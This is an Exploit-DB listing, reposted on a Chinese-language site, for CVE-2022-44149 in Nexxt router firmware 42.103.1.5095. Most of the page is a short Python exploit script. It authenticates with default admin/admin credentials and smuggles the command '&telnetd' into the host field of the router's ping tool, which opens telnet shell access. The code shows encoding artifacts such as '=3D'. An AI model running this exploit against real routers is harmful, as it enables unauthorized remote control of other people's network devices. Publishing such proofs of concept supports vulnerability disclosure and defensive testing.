Nexxt Router Firmware 42.103.1.5095 – Remote Code Execution (RCE) (Authenticated)

• Exploit Database
• 123 阅读

• 作者： Yerodin Richards
  日期： 2023-04-01
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51195/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43

  # Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Executio= n (RCE) (Authenticated) # Date: 19/10/2022 # Exploit Author: Yerodin Richards # Vendor Homepage: https://www.nexxtsolutions.com/ # Version: 42.103.1.5095 # Tested on: ARN02304U8 # CVE : CVE-2022-44149   import requests import base64   router_host =3D "http://192.168.1.1" username =3D "admin" password =3D "admin"     def main(): send_payload("&telnetd") print("connect to router using: <code>telnet "+router_host.split("//")[1]+ "= </code> using known credentials") pass   def gen_header(u, p): return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")   def get_cookie(header): url =3D router_host+"/login" params =3D {"arg":header, "_n":1} resp=3Drequests.get(url, params=3Dparams) =20 def send_payload(payload): url =3D router_host+"/goform/sysTools" headers =3D {"Authorization": "Basic {}".format(gen_header(username, pa= ssword))} params =3D {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK= "} requests.post(url, headers=3Dheaders, data=3Dparams)     if __name__ =3D=3D &apos;__main__&apos;: main()